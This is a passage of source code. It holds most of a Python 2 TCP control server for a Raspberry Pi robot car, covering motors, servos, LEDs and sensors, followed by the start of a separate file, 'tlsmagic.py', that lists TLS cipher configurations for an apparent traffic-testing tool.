LdrSensorRight = 6
#Variable definitions
#RGB LED colour variables
red = 0
green = 0
blue = 0
#TCP packet flag plus receive and send buffers
NewLineReceived = 0
InputString = ''
recvbuf = ''
ReturnTemp = ''
#Car and servo state variables
g_CarState = 0
g_ServoState = 0
#Car speed variable
CarSpeedControl = 80
#Line-tracking, obstacle-avoidance and light-seeking readings
infrared_track_value = ''
infrared_avoid_value = ''
LDR_value = ''
g_lednum = 0
#Use BCM pin numbering
GPIO.setmode(GPIO.BCM)
#Suppress warnings
GPIO.setwarnings(False)
#Motor pins are configured as outputs
#The push-button pin is configured as an input
#Ultrasonic, RGB LED and servo pins are initialized below
#Infrared obstacle-avoidance pins are initialized below
def init():
global pwm_ENA
global pwm_ENB
global pwm_FrontServo
global pwm_UpDownServo
global pwm_LeftRightServo
global pwm_rled
global pwm_gled
global pwm_bled
GPIO.setup(ENA,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(IN1,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN2,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(ENB,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(IN3,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN4,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(buzzer,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(OutfirePin,GPIO.OUT)
GPIO.setup(EchoPin,GPIO.IN)
GPIO.setup(TrigPin,GPIO.OUT)
GPIO.setup(LED_R, GPIO.OUT)
GPIO.setup(LED_G, GPIO.OUT)
GPIO.setup(LED_B, GPIO.OUT)
GPIO.setup(FrontServoPin, GPIO.OUT)
GPIO.setup(ServoUpDownPin, GPIO.OUT)
GPIO.setup(ServoLeftRightPin, GPIO.OUT)
GPIO.setup(AvoidSensorLeft,GPIO.IN)
GPIO.setup(AvoidSensorRight,GPIO.IN)
GPIO.setup(LdrSensorLeft,GPIO.IN)
GPIO.setup(LdrSensorRight,GPIO.IN)
GPIO.setup(TrackSensorLeftPin1,GPIO.IN)
GPIO.setup(TrackSensorLeftPin2,GPIO.IN)
GPIO.setup(TrackSensorRightPin1,GPIO.IN)
GPIO.setup(TrackSensorRightPin2,GPIO.IN)
#Set the motor PWM pins to a frequency of 2000 Hz
pwm_ENA = GPIO.PWM(ENA, 2000)
pwm_ENB = GPIO.PWM(ENB, 2000)
pwm_ENA.start(0)
pwm_ENB.start(0)
#Set the servo PWM frequency and initial duty cycle
pwm_FrontServo = GPIO.PWM(FrontServoPin, 50)
pwm_UpDownServo = GPIO.PWM(ServoUpDownPin, 50)
pwm_LeftRightServo = GPIO.PWM(ServoLeftRightPin, 50)
pwm_FrontServo.start(0)
pwm_UpDownServo.start(0)
pwm_LeftRightServo.start(0)
pwm_rled = GPIO.PWM(LED_R, 1000)
pwm_gled = GPIO.PWM(LED_G, 1000)
pwm_bled = GPIO.PWM(LED_B, 1000)
pwm_rled.start(0)
pwm_gled.start(0)
pwm_bled.start(0)
#Drive forward
def run():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#Drive backward
def back():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#Turn left
def left():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#Turn right
def right():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#Spin left in place
def spin_left():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#Spin right in place
def spin_right():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#Stop the car
def brake():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
#Ultrasonic distance measurement
def Distance_test():
GPIO.output(TrigPin,GPIO.HIGH)
time.sleep(0.000015)
GPIO.output(TrigPin,GPIO.LOW)
while not GPIO.input(EchoPin):
pass
t1 = time.time()
while GPIO.input(EchoPin):
pass
t2 = time.time()
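#Distance in cm = echo time * speed of sound (340 m/s) / 2 for the round trip, * 100 to convert metres to cm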
print "distance is %d " % (((t2 - t1)* 340 / 2) * 100)
time.sleep(0.01)
return ((t2 - t1)* 340 / 2) * 100
#Rotate the front servo to the given angle
def frontservo_appointed_detection(pos):
for i in range(18):
pwm_FrontServo.ChangeDutyCycle(2.5 + 10 * pos/180)
time.sleep(0.02) #wait for the 20 ms period to end
#pwm_FrontServo.ChangeDutyCycle(0) #zero the control signal
#Rotate the camera pan servo to the given angle
def leftrightservo_appointed_detection(pos):
for i in range(1):
pwm_LeftRightServo.ChangeDutyCycle(2.5 + 10 * pos/180)
time.sleep(0.02) #wait for the 20 ms period to end
#pwm_LeftRightServo.ChangeDutyCycle(0) #zero the control signal
#Rotate the camera tilt servo to the given angle
def updownservo_appointed_detection(pos):
for i in range(1):
pwm_UpDownServo.ChangeDutyCycle(2.5 + 10 * pos/180)
time.sleep(0.02) #wait for the 20 ms period to end
#pwm_UpDownServo.ChangeDutyCycle(0) #zero the control signal
#Line-tracking sensor test
def tracking_test():
global infrared_track_value
#When a black line is detected the module LED lights up and the pin reads LOW
#When no black line is detected the module LED is off and the pin reads HIGH
TrackSensorLeftValue1 = GPIO.input(TrackSensorLeftPin1)
TrackSensorLeftValue2 = GPIO.input(TrackSensorLeftPin2)
TrackSensorRightValue1 = GPIO.input(TrackSensorRightPin1)
TrackSensorRightValue2 = GPIO.input(TrackSensorRightPin2)
infrared_track_value_list = ['0','0','0','0']
infrared_track_value_list[0] = str(1 ^TrackSensorLeftValue1)
infrared_track_value_list[1] = str(1 ^TrackSensorLeftValue2)
infrared_track_value_list[2] = str(1 ^TrackSensorRightValue1)
infrared_track_value_list[3] = str(1 ^TrackSensorRightValue2)
infrared_track_value = ''.join(infrared_track_value_list)
#Obstacle-avoidance infrared sensor test
def infrared_avoid_test():
global infrared_avoid_value
#When an obstacle is detected the module LED lights up and the pin reads LOW
#When there is no obstacle the module LED is off and the pin reads HIGH
LeftSensorValue = GPIO.input(AvoidSensorLeft)
RightSensorValue = GPIO.input(AvoidSensorRight)
infrared_avoid_value_list = ['0','0']
infrared_avoid_value_list[0] = str(1 ^LeftSensorValue)
infrared_avoid_value_list[1] = str(1 ^RightSensorValue)
infrared_avoid_value = ''.join(infrared_avoid_value_list)
#Light-seeking sensor test
def follow_light_test():
global LDR_value
#When light is detected the module LED turns off and the pin reads HIGH
#When no light is detected the module LED lights up and the pin reads LOW
LdrSersorLeftValue = GPIO.input(LdrSensorLeft)
LdrSersorRightValue = GPIO.input(LdrSensorRight)
LDR_value_list = ['0','0']
LDR_value_list[0] = str(LdrSersorLeftValue)
LDR_value_list[1] = str(LdrSersorRightValue)
LDR_value = ''.join(LDR_value_list)
#Sound the buzzer
def whistle():
GPIO.output(buzzer, GPIO.LOW)
time.sleep(0.1)
GPIO.output(buzzer, GPIO.HIGH)
time.sleep(0.001)
#Light the RGB LED with the given colour
def color_led_pwm(iRed,iGreen, iBlue):
v_red = (100*iRed)/255
v_green = (100*iGreen)/255
v_blue = (100*iBlue)/255
pwm_rled.ChangeDutyCycle(v_red)
pwm_gled.ChangeDutyCycle(v_green)
pwm_bled.ChangeDutyCycle(v_blue)
time.sleep(0.02)
#Tilt the camera servo up
def servo_up():
global ServoUpDownPos
pos = ServoUpDownPos
updownservo_appointed_detection(pos)
#time.sleep(0.05)
pos +=0.7
ServoUpDownPos = pos
if ServoUpDownPos >= 180:
ServoUpDownPos = 180
#Tilt the camera servo down
def servo_down():
global ServoUpDownPos
pos = ServoUpDownPos
updownservo_appointed_detection(pos)
#time.sleep(0.05)
pos -= 0.7
ServoUpDownPos = pos
if ServoUpDownPos <= 45:
ServoUpDownPos = 45
#Pan the camera servo left
def servo_left():
global ServoLeftRightPos
pos = ServoLeftRightPos
leftrightservo_appointed_detection(pos)
#time.sleep(0.10)
pos += 0.7
ServoLeftRightPos = pos
if ServoLeftRightPos >= 180:
ServoLeftRightPos = 180
#Pan the camera servo right
def servo_right():
global ServoLeftRightPos
pos = ServoLeftRightPos
leftrightservo_appointed_detection(pos)
#time.sleep(0.10)
pos -= 0.7
ServoLeftRightPos = pos
if ServoLeftRightPos <= 0:
ServoLeftRightPos = 0
#Turn the front servo to the left
def front_servo_left():
frontservo_appointed_detection(180)
#Turn the front servo to the right
def front_servo_right():
frontservo_appointed_detection(0)
#Return all servos to the home position
def servo_init():
servoflag = 0
servoinitpos = 90
if servoflag != servoinitpos:
frontservo_appointed_detection(servoinitpos)
updownservo_appointed_detection(servoinitpos)
leftrightservo_appointed_detection(servoinitpos)
time.sleep(0.5)
pwm_FrontServo.ChangeDutyCycle(0) #zero the control signal
pwm_LeftRightServo.ChangeDutyCycle(0) #zero the control signal
pwm_UpDownServo.ChangeDutyCycle(0) #zero the control signal
#Reset the camera tilt servo
def servo_updown_init():
updownservo_appointed_detection(90)
#Stop all servos
def servo_stop():
pwm_LeftRightServo.ChangeDutyCycle(0) #zero the control signal
pwm_UpDownServo.ChangeDutyCycle(0) #zero the control signal
pwm_FrontServo.ChangeDutyCycle(0) #zero the control signal
#Parse the TCP data and carry out the corresponding action
def tcp_data_parse():
global NewLineReceived
global CarSpeedControl
global g_CarState
global g_ServoState
global g_frontServoPos
global red
global green
global blue
global g_lednum
#Parse the pan/tilt servo command sent by the host and rotate the servo
#e.g. $4WD,PTZ180# turns the servo to 180 degrees
if (InputString.find("$4WD,PTZ", 0, len(InputString)) != -1):
i = InputString.find("PTZ", 0, len(InputString))
ii = InputString.find("#", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
g_frontServoPos = 180 - m_kp;
NewLineReceived = 0
InputString.zfill(len(InputString))
#Parse the RGB searchlight command sent by the host and light the requested colour
#e.g. $4WD,CLR255,CLG0,CLB0# lights the LED red
if (InputString.find("CLR", 0, len(InputString)) != -1):
i = InputString.find("CLR", 0, len(InputString))
ii = InputString.find(",CLG", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
red = m_kp
i = InputString.find("CLG", 0, len(InputString))
ii = InputString.find(",CLB", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
green = m_kp
i = InputString.find("CLB", 0, len(InputString))
ii = InputString.find("#", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
blue = m_kp
color_led_pwm(red, green, blue)
NewLineReceived = 0
InputString.zfill(len(InputString))
#Parse the generic protocol command sent by the host and carry out the action
#e.g. $1,0,0,0,0,0,0,0,0,0# drives the car forward
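#Byte positions parsed below: [1] drive key, [3] spin left/right, [5] whistle,
#[7] speed up/down, [9] servo key, [13] LED colour, [15] fire-extinguisher toggle, [17] front-servo reset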
if (InputString.find("$4WD", 0, len(InputString)) == -1) and (InputString.find("#", 0, len(InputString)) != -1):
if InputString[3] == '1':
g_CarState = enTLEFT #spin left in place
elif InputString[3] == '2':
g_CarState = enTRIGHT #spin right in place
else:
g_CarState = enSTOP
if InputString[5] == '1':
whistle() #sound the buzzer
if InputString[7] == '1':
CarSpeedControl += 20
if CarSpeedControl > 100:
CarSpeedControl = 100 #speed up, capped at 100
if InputString[7] == '2':
CarSpeedControl -= 20
if CarSpeedControl < 20: #slow down
CarSpeedControl = 20
#Light the LED with the selected colour
if InputString[13] == '1':
g_lednum=g_lednum+1
if g_lednum == 1:
color_led_pwm(255, 255, 255)
elif g_lednum == 2:
color_led_pwm(255, 0, 0)
elif g_lednum == 3:
color_led_pwm(0, 255, 0)
elif g_lednum == 4:
color_led_pwm(0, 0, 255)
elif g_lednum == 5:
color_led_pwm(255, 255, 0)
elif g_lednum == 6:
color_led_pwm(0, 255, 255)
elif g_lednum == 7:
color_led_pwm(255, 0, 255)
else :
color_led_pwm(0, 0 ,0)
g_lednum = 0
if InputString[13] == '2':
color_led_pwm(255, 0, 0)
if InputString[13] == '3':
color_led_pwm(0, 255, 0)
if InputString[13] == '4':
color_led_pwm(0, 0, 255)
#Fire-extinguishing motor
if InputString[15] == '1':
GPIO.output(OutfirePin,not GPIO.input(OutfirePin) )
time.sleep(1)
#Reset the front servo
if InputString[17] == '1':
g_frontServoPos = 90
#Parse the car motion state
if g_CarState != enTLEFT and g_CarState != enTRIGHT:
if InputString[1] == run_car:
g_CarState = enRUN
elif InputString[1] == back_car:
g_CarState = enBACK
elif InputString[1] == left_car:
g_CarState = enLEFT
elif InputString[1] == right_car:
g_CarState = enRIGHT
elif InputString[1] == stop_car:
g_CarState = enSTOP
else:
g_CarState = enSTOP
#Parse the servo state
if InputString[9] == front_left_servo:
g_frontServoPos = 180
elif InputString[9] == front_right_servo:
g_frontServoPos = 0
elif InputString[9] == up_servo:
g_ServoState = enSERVOUP
elif InputString[9] == down_servo:
g_ServoState = enSERVODOWN
elif InputString[9] == left_servo:
g_ServoState = enSERVOLEFT
elif InputString[9] == right_servo:
g_ServoState = enSERVORIGHT
elif InputString[9] == updowninit_servo:
g_ServoState = enSERVOUPDOWNINIT
elif InputString[9] == stop_servo:
g_ServoState = enSERVOSTOP
else:
g_ServoState = enSERVOSTOP
NewLineReceived = 0
InputString.zfill(len(InputString))
#Make the car move according to the parsed state
if g_CarState == enSTOP:
brake()
elif g_CarState == enRUN:
run()
elif g_CarState == enLEFT:
left()
elif g_CarState == enRIGHT:
right()
elif g_CarState == enBACK:
back()
elif g_CarState == enTLEFT:
spin_left()
elif g_CarState == enTRIGHT:
spin_right()
else:
brake()
#Frame the data received over TCP
def Data_Pack():
global InputString
global NewLineReceived
if recvbuf[0] == '$' and recvbuf.find("#", 0, len(recvbuf)) != -1:
InputString = recvbuf
NewLineReceived = 1
print "InputString: %s" % InputString
#Send the collected sensor data back to the host for display
def tcp_data_postback():
#Ultrasonic and other sensor readings are sent back to the host for display
#Packet format, e.g.:
# ultrasonic voltage greyscale line-tracking obstacle-avoidance light-seeking
#$4WD,CSB120,PV8.3,GS214,LF1011,HW11,GM11#
global ReturnTemp
ReturnTemp = ''
distance = Distance_test()
ReturnTemp += "$4WD,CSB"
ReturnTemp += str(int(distance))
ReturnTemp += ",PV8.4"
ReturnTemp += ",GS0"
ReturnTemp += ",LF"
tracking_test()
ReturnTemp += infrared_track_value
ReturnTemp += ",HW"
infrared_avoid_test()
ReturnTemp += infrared_avoid_value
ReturnTemp += ",GM"
follow_light_test()
ReturnTemp += LDR_value
ReturnTemp += "#"
print "ReturnTemp: %s" % ReturnTemp
return ReturnTemp
#Servo control thread
def ServorThread():
#Check the servo state and call the matching function
global g_frontServoPos
global g_nowfrontPos
if g_ServoState == enSERVOUP:
servo_up()
elif g_ServoState == enSERVODOWN:
servo_down()
elif g_ServoState == enSERVOLEFT:
servo_left()
elif g_ServoState == enSERVORIGHT:
servo_right()
elif g_ServoState == enSERVOUPDOWNINIT:
servo_updown_init()
elif g_ServoState == enSERVOSTOP:
servo_stop()
if g_nowfrontPos != g_frontServoPos:
frontservo_appointed_detection(g_frontServoPos)
g_nowfrontPos = g_frontServoPos
pwm_FrontServo.ChangeDutyCycle(0) #zero the control signal
try:
init()
servo_init()
global g_ServoState
global timecount
global connectflag
connectflag = 0
timecount = 1000
count = 50
#Create the listening socket and set it to non-blocking mode
tcpservicesock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcpservicesock.setblocking(0)
#Fill in the server IP address and port to bind
#Note: this must match the IP address of your own Raspberry Pi
tcpservicesock.bind(('192.168.0.1', 8888))
#Listen for client connections
tcpservicesock.listen(5)
print "waiting for connection...."
#List of connected client sockets
clientAddrList = []
thread1 = threading.Thread(target = ServorThread)
thread1.start()
thread1.join()
while True:
try:
#Accept a client connection and return the connected socket
print "Start accept!"
tcpclientsock,addr = tcpservicesock.accept()
if tcpclientsock:
connectflag = 1
except:
pass
else:
print "new user :%s " % str(addr)
#Set the connected socket to non-blocking mode and add it to the client list
tcpclientsock.setblocking(0)
clientAddrList.append((tcpclientsock,addr))
for tcpclientsock,addr in clientAddrList:
try:
global recvbuf
global sendbuf
recvbuf = ''
#Receive data over TCP
print "Start recv!"
recvbuf = tcpclientsock.recv(128)
print "Start recv over!"
except:
pass
else:
if len(recvbuf) > 0:
#Frame the received data
Data_Pack()
if NewLineReceived == 1:
#Call the data parsing function
tcp_data_parse()
else:
tcpclientsock.close()
clientAddrList.remove((tcpclientsock,addr))
#After the delay, send the collected sensor data back to the client
timecount -= 1
if timecount == 0:
count -= 1
timecount = 1000
if count == 0:
sendbuf = ''
sendbuf = tcp_data_postback()
if not sendbuf:
break
if connectflag:
#Send the collected data to the client
tcpclientsock.send(sendbuf)
timecount = 1000
count = 50
ServorThread()
except KeyboardInterrupt:
pass
tcpclientsock.close()
tcpservicesock.close()
pwm_ENA.stop()
pwm_ENB.stop()
pwm_rled.stop()
pwm_gled.stop()
pwm_bled.stop()
pwm_FrontServo.stop()
pwm_LeftRightServo.stop()
pwm_UpDownServo.stop()
GPIO.cleanup()
|
tlsmagic.py
|
__author__ = 'Shirish Pal'
import os
import subprocess
import sys
import argparse
import json
import jinja2
import time
from threading import Thread
import pdb
supported_ciphers = [
{'cipher_name' : 'AES128-SHA',
'cipher' : '{AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '10.2',
'server_ip_prefix' : '100.2'
},
{'cipher_name' : 'AES256-SHA',
'cipher' : '{AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '11.2',
'server_ip_prefix' : '101.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA',
'cipher' : '{DHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '12.2',
'server_ip_prefix' : '102.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA',
'cipher' : '{DHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '13.2',
'server_ip_prefix' : '103.2'
},
{'cipher_name' : 'DHE-RSA-AES128-GCM-SHA256',
'cipher' : '{DHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '14.2',
'server_ip_prefix' : '104.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA',
'cipher' : '{ECDHE-ECDSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '15.2',
'server_ip_prefix' : '105.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA',
'cipher' : '{ECDHE-ECDSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '16.2',
'server_ip_prefix' : '106.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA',
'cipher' : '{ECDHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '17.2',
'server_ip_prefix' : '107.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA',
'cipher' : '{ECDHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '18.2',
'server_ip_prefix' : '108.2'
},
{'cipher_name' : 'ECDHE-ECDSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-ECDSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '19.2',
'server_ip_prefix' : '109.2'
},
{'cipher_name' : 'DHE-RSA-CHACHA20-POLY1305',
'cipher' : '{DHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '20.2',
'server_ip_prefix' : '110.2'
},
{'cipher_name' : 'CAMELLIA128-SHA',
'cipher' : '{CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '21.2',
'server_ip_prefix' : '111.2'
},
{'cipher_name' : 'CAMELLIA256-SHA',
'cipher' : '{CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '22.2',
'server_ip_prefix' : '112.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA128-SHA',
'cipher' : '{DHE-RSA-CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '23.2',
'server_ip_prefix' : '113.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA256-SHA',
'cipher' : '{DHE-RSA-CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '24.2',
'server_ip_prefix' : '114.2'
},
{'cipher_name' : 'AES128-SHA256',
'cipher' : '{AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '25.2',
'server_ip_prefix' : '115.2'
},
{'cipher_name' : 'AES256-SHA256',
'cipher' : '{AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '26.2',
'server_ip_prefix' : '116.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA256',
'cipher' : '{DHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '27.2',
'server_ip_prefix' : '117.2'
},
{'cipher_name' : 'AES128-GCM-SHA256',
'cipher' : '{AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '28.2',
'server_ip_prefix' : '118.2'
},
{'cipher_name' : 'AES256-GCM-SHA384',
'cipher' : '{AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '29.2',
'server_ip_prefix' : '119.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '30.2',
'server_ip_prefix' : '120.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '31.2',
'server_ip_prefix' : '121.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA256',
'cipher' : '{ECDHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '32.2',
'server_ip_prefix' : '122.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA384',
'cipher' : '{ECDHE-RSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '33.2',
'server_ip_prefix' : '123.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA256',
'cipher' : '{DHE-RSA-AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '34.2',
'server_ip_prefix' : '124.2'
},
{'cipher_name' : 'DHE-RSA-AES256-GCM-SHA384',
'cipher' : '{DHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '35.2',
'server_ip_prefix' : '125.2'
},
{'cipher_name' : 'ECDHE-RSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '36.2',
'server_ip_prefix' : '126.2'
},
{'cipher_name' : 'TLS_AES_128_GCM_SHA256',
'cipher' : '{TLS_AES_128_GCM_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '37.2',
'server_ip_prefix' : '139.2'
},
